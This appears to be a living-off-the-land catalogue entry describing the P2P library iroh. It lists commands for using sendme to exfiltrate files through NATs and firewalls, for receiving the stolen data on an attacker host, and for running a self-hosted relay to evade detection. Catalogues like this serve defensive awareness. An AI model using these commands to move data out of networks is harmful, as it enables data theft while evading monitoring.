.. /iroh
Star

Exfiltration
Download
Install

iroh is a P2P networking library by n0-computer. Devices connect by public key over QUIC, hole-punch through NATs and firewalls, and fall back to relay servers when direct connections fail. Traffic is end-to-end encrypted, so relay operators and TLS inspection appliances cannot read it. The sendme CLI transfers files over iroh, and the iroh-relay binary can be self-hosted via Docker. iroh’s website promotes it as a replacement for third-party VPNs.

Paths:

Resources:

Acknowledgements:

Detections:

Exfiltration

  1. Installs sendme and sends a file. Outputs a ticket the receiver uses to download it over an encrypted P2P connection.

    cargo install sendme && sendme send <file>
    Use case
    Exfiltrating files over an encrypted P2P tunnel that bypasses NATs and firewalls.
    Privileges required
    User
    Operating systems
    Windows, Linux, MacOS

Download

  1. Downloads a file using a ticket from the sender over an encrypted P2P connection with NAT traversal.

    sendme receive <ticket>
    Use case
    Pulling exfiltrated data onto an attacker-controlled host.
    Privileges required
    User
    Operating systems
    Windows, Linux, MacOS

Install

  1. Runs an iroh relay server in Docker on port 443 (HTTPS) and 3478/udp (STUN for NAT traversal).

    docker run -d -p 443:443 -p 3478:3478/udp n0computer/iroh-relay
    Use case
    Running a self-hosted relay to avoid detection on default n0.computer domains.
    Privileges required
    User
    Operating systems
    Windows, Linux, MacOS